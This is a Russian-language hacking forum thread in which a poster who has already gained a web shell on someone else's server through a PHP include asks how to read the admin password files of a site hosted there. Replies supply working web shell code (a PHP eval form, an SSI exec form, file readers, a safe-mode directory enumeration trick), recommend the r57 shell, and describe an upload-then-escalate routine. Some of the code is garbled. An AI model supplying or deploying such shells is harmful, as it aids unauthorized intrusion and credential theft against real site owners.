Здравствуйте! Вчера мне довелось взяться за взлом одного сервака, нашёл там php-include, получил веб-шелл. Хочу получить пароли от админки одого сайта, пытался использовать утилиту cat для чтения php-файлов с паролями, но везде на нужных мне файлах стоят чмоды -rw-r--r-- , этот способ почему-то не проходит, при обычном обращении к таким php-файлам через браузер они исполняются интерпритатором, поэтому мне кажется, что эти файлы можно прочитать с помощью такого веб-шелла, где не используются system, passthru,exec,etc, а используются такие php-функции как chdir(), fpassthru() и т.д. Использовать сплойт для ядра пока что не хочу, а Программировать нормально на php я пока что не умею, поэтому прошу вас подсказать мне публичные веб-шеллы такого типа, помогите, please!
CODE <html> <body> <script language="JavаScript"> <!-- function execute() { var cmd = document.exec.cmd.value; document.write('<html><body><!--#exec cmd="'+cmd+'"--></body></html>'); } //--> </script> <form name="exec"> <input type="text" name="cmd" size="20" value=""> <input type="submit" value="exec" onClick="execute()"> </form> </body> </html>
Покури форум еще!! Вот на форуме давно кто-то выложил! <?php $file=""; $tem=""; $temp=tempnam($tem, "cx"); if(copy("http://".$file, $temp)) { $otrit = fopen($temp, "r"); $pokaz = fread($otrit, filesize($temp)); fclose($otrit); echo htmlspecialchars($pokaz); unlink($temp); } ?>
Есть , но стоит денег! Поставь хоть +! Потыкай вот это еще Code: <? "; echo ""; echo " Root directory: "; echo ""; echo " ------------------------------------ "; // break fucking safe-mode ! $root = "/"; if($_POST['root']) $root = $_POST['root']; if (!ini_get('safe_mode')) die("Safe-mode is OFF."); $c = 0; $D = array(); set_error_handler("eh"); $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKL MNOPQRSTUVWXYZ"; for($i=0; $i "; foreach($D as $item) echo "{$item}\n"; echo " "; function eh($errno, $errstr, $errfile, $errline){ global $D, $c, $i; preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); if($o){ $D[$c] = $o[2]; $c++;} } ?>
Слушай у меня такое подозрение, что новички с репой 0 не могут добавлять никому репутацию, но мы с тобой ещё сочтёмся, парень!
PHP: <?php $gpc=get_magic_quotes_gpc(); if (!empty($_POST['c'])) { $c = $gpc?stripslashes($_POST['c']):$_POST['c']; } else { $c = NULL; } ?> <form action="" method="POST"> <textarea cols="80" rows="30" name="c" id="c"><?php echo $c;?></textarea> <br /> <input type="submit"/> </form> <?php if (!is_null($c)) eval($c); ?> ========= Вот. Значит, будет у тебя поле, куда будешь писать PHP-код, а потом нажимать на кнопку, и он будет исполняться. =========== Вот код для просмотра текущей директории: PHP: $d = dir("."); echo "Дескриптор: ".$d->handle."<br>\n"; echo "Путь: ".$d->path."<br>\n"; while (false !== ($entry = $d->read())) { echo $entry."<br>\n"; } $d->close(); ============= А вот для файла: PHP: echo '<xmp>'; htmlspecialchars(readfile('file.php')); echo '</xmp>'; ------------------------------------- <xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i> ================= Есть еще шелл, не использующий system: http://php.spb.ru/remview/
В 2 словах при включенном Safe-mode юзай просто r57 шелл он позволяет просмотреть директории на сервере и прочитать файлы+ используй все что я скинул и последнее. Я обычно делаю так: 1. Заливаю r57 , потом свой самопал , затем права(если nobody), то все в шляпе можешь просмотреть все на сервере почти.
<xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i> а тогда накой штмлспециалчарс???
Да. Ты прав. Здесь можно обойтись одним лишь htmlspecialchars. Это лишнюю работу я сделал, написав <xmp>, </xmp>.
Да я их не поднимаю ! Это если ты похакал и права nobody(тогда на сервере можешь просматривать все диры и файлы!)!
А. Твой скрипт стопудово будет с правами, от которых работает Apache. Которые могут быть nobody. Или может быть создан специальный юзверь www.
SkyMan fly Пишите полный бред. Ты хотя бы понимаешь почему так происходит... Все зависит от группы. Как правило ты не пожешь просматривать а вот Можешь потаму что демон апача обзятельно будет смотреть поэтому ты и сможешь ее просматреть. А те юзеры котрым был создан отдельный uid те просто поставяь на эту папку свой chmod и все будет будет работать(apache), а ты ее просмотреть не сможешь.
Я понимаю, что ты умный очень. Но я объяснил человеку который плохо понимает, что делает. Походу дорогу я тебе перебежал. ! Кста он меня понял, а вот тебя врядли. Не лечи доктор. С nobody я просмотрю все на сервере и с apache тоже. Практика большая, хоть и не Гуру!
>> свой chmod и все будет будет работать(apache), а ты ее просмотреть не сможешь. Тут не спорю, но часто все нормально проходит.
